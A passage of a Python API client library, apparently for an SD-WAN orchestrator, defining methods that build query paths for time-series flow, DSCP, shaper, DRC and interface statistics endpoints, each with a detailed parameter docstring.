COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param group_pk: Filter by appliance group identifier,
e.g. ``0.Network`` is root group, ``1.Network`` is internal use,
``2.Network`` is auto-discovered groups, ``3.Network`` and
beyond is user-defined groups, defaults to None
:type group_pk: str, optional
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to "all_traffic"
:type traffic_type: str, optional
:param flow_type: Filter for data belonging to a particular flow
type, accepted values are ``TCP_ACCELERATED``,
``TCP_NON_ACCELERATED``, and ``NON_TCP``,
defaults to "TCP_ACCELERATED"
:type flow_type: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/flow?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
if group_pk is not None:
path = path + "&groupPk={}".format(group_pk)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&flowType={}".format(flow_type)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_flow_ne_pk_list(
self,
ne_pk_list: list[str],
start_time: int,
end_time: int,
granularity: str,
traffic_type: str = "all_traffic",
flow_type: str = "TCP_ACCELERATED",
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series flow statistics for list of appliances
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- POST
- /stats/timeseries/flow
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk_list: List of one or more appliance Network Primary
Keys (nePk), e.g. ``["3.NE","5.NE"]``
:type ne_pk_list: list[str]
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to "all_traffic"
    :type traffic_type: str, optional
:param flow_type: Filter for data belonging to a particular flow
type, accepted values are ``TCP_ACCELERATED``,
``TCP_NON_ACCELERATED``, and ``NON_TCP``,
defaults to "TCP_ACCELERATED"
    :type flow_type: str, optional
:param limit: Limit the number of stats entity retrieved.
When unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/flow?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&flowType={}".format(flow_type)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
data = {"ids": ne_pk_list}
return self._post(path, data=data)
def get_timeseries_stats_flow_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
traffic_type: str = "all_traffic",
flow_type: str = "TCP_ACCELERATED",
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series flow statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/flow/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to "all_traffic"
    :type traffic_type: str, optional
:param flow_type: Filter for data belonging to a particular flow
type, accepted values are ``TCP_ACCELERATED``,
``TCP_NON_ACCELERATED``, and ``NON_TCP``,
defaults to "TCP_ACCELERATED"
    :type flow_type: str, optional
:param limit: Limit the number of stats entity retrieved.
When unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/flow/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&flowType={}".format(flow_type)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_dscp(
self,
start_time: int,
end_time: int,
granularity: str,
dscp: int,
group_pk: str = None,
traffic_type: str = "all_traffic",
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series dscp statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/dscp
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param dscp: Filter for data which belongs to a certain DSCP type,
valid values are ``0`` through ``63``
:type dscp: int
:param group_pk: Filter by appliance group identifier,
e.g. ``0.Network`` is root group, ``1.Network`` is internal use,
``2.Network`` is auto-discovered groups, ``3.Network`` and
beyond is user-defined groups, defaults to None
    :type group_pk: str, optional
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to "all_traffic"
    :type traffic_type: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/dscp?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
if group_pk is not None:
path = path + "&groupPk={}".format(group_pk)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&dscp={}".format(dscp)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_dscp_ne_pk_list(
self,
ne_pk_list: list[str],
start_time: int,
end_time: int,
granularity: str,
dscp: int,
traffic_type: str = "all_traffic",
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series dscp statistics for list of appliances
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- POST
- /stats/timeseries/dscp
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk_list: List of one or more appliance Network Primary
Keys (nePk), e.g. ``["3.NE","5.NE"]``
:type ne_pk_list: list[str]
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param dscp: Filter for data which belongs to a certain DSCP type,
accepted values are within the range ``[0,63]``
:type dscp: int
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to "all_traffic"
    :type traffic_type: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/dscp?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&dscp={}".format(dscp)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
data = {"ids": ne_pk_list}
return self._post(path, data=data)
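# A hedged call sketch for the list variant (client instance ``orch``
# assumed): the query parameters ride on the URL while the appliance ids
# travel in the POST body, mirroring ``data = {"ids": ne_pk_list}`` above.
#
#   resp = orch.get_timeseries_stats_dscp_ne_pk_list(
#       ne_pk_list=["3.NE", "5.NE"],
#       start_time=1640995200,
#       end_time=1641081600,
#       granularity="hour",
#       dscp=34,
#   )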
def get_timeseries_stats_dscp_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
dscp: int,
traffic_type: str = "all_traffic",
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series dscp statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/dscp/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param dscp: Filter for data which belongs to a certain DSCP type,
accepted values are within the range ``[0,63]``
:type dscp: int
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to "all_traffic"
:type traffic_type: str
:param limit: Limit the number of stats entries retrieved. When
unspecified, the API defaults to 10,000, which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/dscp/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&dscp={}".format(dscp)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
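# For illustration, the path assembled above for ``ne_pk="3.NE"`` with only
# the required arguments would look like this (epoch values assumed):
#
#   /stats/timeseries/dscp/3.NE?startTime=1640995200&endTime=1641081600
#       &granularity=minute&trafficType=all_traffic&dscp=46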
def get_timeseries_stats_shaper(
self,
start_time: int,
end_time: int,
granularity: str,
traffic_class: int,
direction: int,
group_pk: str = None,
data_format: str = None,
ip: bool = None,
) -> dict:
"""Get time series shaper statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/shaper
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_class: Filter for data which belongs to particular
traffic class, accepted values are within the range ``[1,10]``
:type traffic_class: int
:param direction: ``0`` for outbound, ``1`` for inbound
:type direction: int
:param group_pk: Filter by appliance group identifier,
e.g. ``0.Network`` is root group, ``1.Network`` is internal use,
``2.Network`` is auto-discovered groups, ``3.Network`` and
beyond is user-defined groups, defaults to None
:type group_pk: str, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/shaper?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
if group_pk is not None:
path = path + "&groupPk={}".format(group_pk)
path = path + "&trafficClass={}".format(traffic_class)
path = path + "&direction={}".format(direction)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
return self._get(path)
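# A short usage sketch (client instance ``orch`` assumed): ``direction``
# is an integer flag, so ``0`` requests outbound shaper stats and ``1``
# inbound, scoped to a traffic class in the range [1,10].
#
#   outbound = orch.get_timeseries_stats_shaper(
#       start_time=1640995200,
#       end_time=1641081600,
#       granularity="hour",
#       traffic_class=1,
#       direction=0,
#   )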
def get_timeseries_stats_shaper_ne_pk_list(
self,
ne_pk_list: list[str],
start_time: int,
end_time: int,
granularity: str,
traffic_class: int,
direction: int,
data_format: str = None,
ip: bool = None,
) -> dict:
"""Get time series shaper statistics for list of appliances
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- POST
- /stats/timeseries/shaper
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param ne_pk_list: List of one or more appliance Network Primary
Keys (nePk), e.g. ``["3.NE","5.NE"]``
:type ne_pk_list: list[str]
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_class: Filter for data which belongs to particular
traffic class, accepted values are within the range ``[1,10]``
:type traffic_class: int
:param direction: ``0`` for outbound, ``1`` for inbound
:type direction: int
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/shaper?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
path = path + "&trafficClass={}".format(traffic_class)
path = path + "&direction={}".format(direction)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
data = {"ids": ne_pk_list}
return self._post(path, data=data)
def get_timeseries_stats_internal_drops_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
) -> dict:
"""Get time series internal drops statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/internalDrops/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/internalDrops/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
return self._get(path)
def get_timeseries_stats_drc(
self,
start_time: int,
end_time: int,
granularity: str,
group_pk: str = None,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series drc statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/drc
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param group_pk: Filter by appliance group identifier,
e.g. ``0.Network`` is root group, ``1.Network`` is internal use,
``2.Network`` is auto-discovered groups, ``3.Network`` and
beyond is user-defined groups, defaults to None
:type group_pk: str, optional
:param limit: Limit the number of stats entries retrieved. When
unspecified, the API defaults to 10,000, which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/drc?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
if group_pk is not None:
path = path + "&groupPk={}".format(group_pk)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_drc_ne_pk_list(
self,
ne_pk_list: list[str],
start_time: int,
end_time: int,
granularity: str,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series drc statistics for list of appliances
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- POST
- /stats/timeseries/drc
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param ne_pk_list: List of one or more appliance Network Primary
Keys (nePk), e.g. ``["3.NE","5.NE"]``
:type ne_pk_list: list[str]
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param limit: Limit the number of stats entries retrieved. When
unspecified, the API defaults to 10,000, which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/drc?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
data = {"ids": ne_pk_list}
return self._post(path, data=data)
def get_timeseries_stats_drc_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
tunnel_name: str,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series drc statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/drc/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param tunnel_name: Filter for data which belongs to specified
tunnel name
:type tunnel_name: str
:param limit: Limit the number of stats entries retrieved. When
unspecified, the API defaults to 10,000, which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/drc/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
path = path + "&tunnelName={}".format(tunnel_name)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_interface_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
traffic_type: str = "all_traffic",
interface_name: str = None,
limit: int = None,
) -> list:
"""Get time series interface statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/interface/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to "all_traffic"
:type traffic_type: str
:param interface_name: Filter data by interface name,
defaults to None
:type interface_name: str, optional
:param limit: Limit the number of stats entries retrieved. When
unspecified, the API defaults to 10,000, which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:return: Returns list of dictionaries
:rtype: list
"""
path = (
"/stats/timeseries/interface/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
if interface_name is not None:
path = path + "&interfaceName={}".format(interface_name)
if limit is not None:
path = path + "&limit={}".format(limit)
return self._get(path)
def get_timeseries_stats_interface_overlay_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
overlay: str = None,
tunnel_type: int = None,
label_id: int = None,
is_wan_side: bool = None,
interface_name: str = None,
limit: int = None,
) -> list:
"""Get time series interface overlay statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/interfaceOverlay/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
